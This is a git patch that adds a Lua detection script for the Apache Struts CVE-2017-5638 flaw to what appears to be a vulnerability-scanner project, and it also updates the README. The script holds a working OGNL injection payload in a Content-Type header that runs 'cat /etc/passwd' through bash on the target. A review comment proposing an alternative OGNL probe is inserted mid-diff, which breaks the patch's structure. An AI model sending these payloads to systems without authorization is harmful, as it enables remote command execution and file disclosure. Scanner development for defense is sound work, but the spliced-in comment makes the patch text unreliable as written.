From 5159dbc3748fa1cc80bbb9161028d71e17539ca2 Mon Sep 17 00:00:00 2001
From: Mohamed Tarek
Date: Fri, 13 Oct 2023 01:53:55 +0300
Subject: [PATCH] New script for CVE-2017-5638
---
CVE/CVE-2017-5638.lua | 38 ++++++++++++++++++++++++++++++++++++++
README.md | 2 +-
2 files changed, 39 insertions(+), 1 deletion(-)
create mode 100644 CVE/CVE-2017-5638.lua
diff --git a/CVE/CVE-2017-5638.lua b/CVE/CVE-2017-5638.lua
new file mode 100644
index 0000000..3dbbae1
--- /dev/null
+++ b/CVE/CVE-2017-5638.lua
@@ -0,0 +1,38 @@
+-- AUTHOR: Mohamed Tarek @0xr00t3d
+-- Reference: https://blog.talosintelligence.com/apache-0-day-exploited/
+
+SCAN_TYPE = 2
+BODY_MATCH = {"root:.*:0:0:"}
+
+local function send_report(resp)
+ Reports:add {
+ name = "CVE-2017-5638",
+ url = resp.url,
+ risk = "Critical",
+ description = "Apache Struts 2.3.x before 2.3.32 and 2.5.x before 2.5.10.1 is susceptible to remote command injection attacks. The Jakarta Multipart parser has incorrect exception handling and error-message generation during file upload attempts, which can allow an attacker to execute arbitrary commands via a crafted Content-Type, Content-Disposition, or Content-Length HTTP header. This was exploited in March 2017 with a Content-Type header containing a #cmd= string.",
+ }
+end
+
+local function scan_cve()
+ local new_url = HttpMessage:url()
+ local headers = {}
+ headers["Content-Type"] = [[%{(#test='multipart/form-data').(#dm=@ognl.OgnlContext@DEFAULT_MEMBER_ACCESS).(#_memberAccess=@ognl.OgnlContext@DEFAULT_MEMBER_ACCESS,#cmd="cat /etc/passwd",#cmds={"/bin/bash","-c",#cmd},#p=new java.lang.ProcessBuilder(#cmds),#p.redirectErrorStream(true),#process=#p.start(),#b=#process.getInputStream(),#c=new java.io.InputStreamReader(#b),#d=new java.io.BufferedReader(#c),#e=new char[50000],#d.read(#e),#rw=@org.apache.struts2.ServletActionContext@getResponse().getWriter(),#rw.println(#e),#rw.flush())}]]
+
+ local status, resp = pcall(function()
+ return http:send { url = new_url , headers = headers}
+ end)
+
+ if status ~= true then return end
+ if resp.status ~= 200 then return end
+
+
+ local body = resp.body
+
+ if Matcher:match_body_once(body, BODY_MATCH) then
+ send_report(resp)
+ end
+end
+
+function main()
+ scan_cve()
+end
diff --git a/README.md b/README.md
index aa4e242..08839d3 100644
--- a/README.md
+++ b/README.md
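Review bot: The OGNL probe assigned to `headers["Content-Type"]` in scan_cve() spawns `/bin/bash -c "cat /etc/passwd"` on the target, which is more intrusive than detection requires and is Linux-specific: a vulnerable Struts instance on Windows, or any host without `/bin/bash`, produces nothing matching `root:.*:0:0:` and is reported clean. Because the expression already obtains the servlet response writer, it can prove injection without starting a process by printing a computed marker that cannot occur on a benign page, e.g. `(#rw=@org.apache.struts2.ServletActionContext@getResponse().getWriter()).(#rw.println('s2045_'+(1337*2))).(#rw.flush())` together with `BODY_MATCH = {"s2045_2674"}` (this relies on OGNL's `+` concatenating when one operand is a string, which is worth confirming against a known-vulnerable build). The `#dm` assignment in the same expression is never referenced afterwards and can be dropped. Separately, `if status ~= true then return end` discards the pcall error, so a transport failure is indistinguishable from a clean target; if the host framework offers a logger, record `resp` (which holds the error message on failure) before returning.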
@@ -22,7 +22,7 @@ We're developing scripts for famous CVEs, like CVE-2014-2321, CVE-2019-11248, CV
 | CVE-2022-0381.lua | :heavy_check_mark: Finished |
 | CVE-2022-1234.lua | :hourglass_flowing_sand: In progress |
 | SSH Bruteforce | :hourglass_flowing_sand: In progress |
-| CVE-2017-5638 Apache Struts | :hourglass_flowing_sand: In progress |
+| CVE-2017-5638 Apache Struts | :heavy_check_mark: Finished|
 | CVE-2017-11882 Microsoft | :hourglass_flowing_sand: In progress |
 | CVE-2018-7600 Drupal | :hourglass_flowing_sand: In progress |
 | CVE-2018-8174 Windows | :hourglass_flowing_sand: In progress |